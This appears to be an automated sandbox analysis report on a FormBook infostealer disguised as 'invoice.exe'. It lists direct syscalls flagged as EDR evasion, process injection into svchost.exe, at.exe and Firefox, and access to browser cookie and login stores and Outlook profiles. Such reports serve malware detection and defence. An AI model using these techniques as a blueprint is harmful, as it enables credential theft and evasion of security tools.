            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEA60 mov eax, dword ptr fs:[00000030h]1_2_039DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov esi, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]1_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]1_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039649D0 mov eax, dword ptr fs:[00000030h]1_2_039649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA9D3 mov eax, dword ptr fs:[00000030h]1_2_039FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C69C0 mov eax, dword ptr fs:[00000030h]1_2_039C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]1_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]1_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE9E0 mov eax, dword ptr fs:[00000030h]1_2_039BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC912 mov eax, dword ptr fs:[00000030h]1_2_039BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]1_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]1_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]1_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]1_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B892A mov eax, dword ptr fs:[00000030h]1_2_039B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C892B mov eax, dword ptr fs:[00000030h]1_2_039C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0946 mov eax, dword ptr fs:[00000030h]1_2_039B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]1_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]1_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC97C mov eax, dword ptr fs:[00000030h]1_2_039BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov edx, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC89D mov eax, dword ptr fs:[00000030h]1_2_039BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930887 mov eax, dword ptr fs:[00000030h]1_2_03930887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E8C0 mov eax, dword ptr fs:[00000030h]1_2_0395E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]1_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]1_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA8E4 mov eax, dword ptr fs:[00000030h]1_2_039FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC810 mov eax, dword ptr fs:[00000030h]1_2_039BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov ecx, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A830 mov eax, dword ptr fs:[00000030h]1_2_0396A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D483A mov eax, dword ptr fs:[00000030h]1_2_039D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D483A mov eax, dword ptr fs:[00000030h]1_2_039D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960854 mov eax, dword ptr fs:[00000030h]1_2_03960854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934859 mov eax, dword ptr fs:[00000030h]1_2_03934859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934859 mov eax, dword ptr fs:[00000030h]1_2_03934859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03942840 mov ecx, dword ptr fs:[00000030h]1_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE872 mov eax, dword ptr fs:[00000030h]1_2_039BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE872 mov eax, dword ptr fs:[00000030h]1_2_039BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6870 mov eax, dword ptr fs:[00000030h]1_2_039C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6870 mov eax, dword ptr fs:[00000030h]1_2_039C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962F98 mov eax, dword ptr fs:[00000030h]1_2_03962F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962F98 mov eax, dword ptr fs:[00000030h]1_2_03962F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CF80 mov eax, dword ptr fs:[00000030h]1_2_0396CF80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04FE7 mov eax, dword ptr fs:[00000030h]1_2_03A04FE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h]1_2_0392EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h]1_2_0392EFD8
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FD81D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FD81D4
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FAA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FAA2D5
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FAA2A4 SetUnhandledExceptionFilter,0_2_00FAA2A4

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\invoice.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\at.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\at.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\at.exeThread register set: target process: 5024Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\at.exeThread APC queued: target process: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\invoice.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EA3008Jump to behavior
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FD8A73 LogonUserW,0_2_00FD8A73
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F83B4C
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F84A35
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE4CFA mouse_event,0_2_00FE4CFA
            Source: C:\Users\user\Desktop\invoice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice.exe"Jump to behavior
            Source: C:\Program Files (x86)\wAiOCcamxRfzdBcBWXwLfjHIIYCfAhsLfVGJoOsCkvsHCbLMZ\usnnduqerdgHbr.exeProcess created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FD81D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00FD81D4
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE4A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00FE4A08
            Source: invoice.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: invoice.exe, usnnduqerdgHbr.exe, 00000002.00000000.1784686792.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3576005909.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576429437.0000000001180000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: usnnduqerdgHbr.exe, 00000002.00000000.1784686792.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3576005909.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576429437.0000000001180000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: usnnduqerdgHbr.exe, 00000002.00000000.1784686792.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3576005909.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576429437.0000000001180000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: usnnduqerdgHbr.exe, 00000002.00000000.1784686792.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000002.00000002.3576005909.0000000001180000.00000002.00000001.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576429437.0000000001180000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FA87AB cpuid 0_2_00FA87AB
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FB5007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00FB5007
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FC215F GetUserNameW,0_2_00FC215F
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FB40BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00FB40BA
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00F84AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\at.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\at.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: invoice.exeBinary or memory string: WIN_81
            Source: invoice.exeBinary or memory string: WIN_XP
            Source: invoice.exeBinary or memory string: WIN_XPe
            Source: invoice.exeBinary or memory string: WIN_VISTA
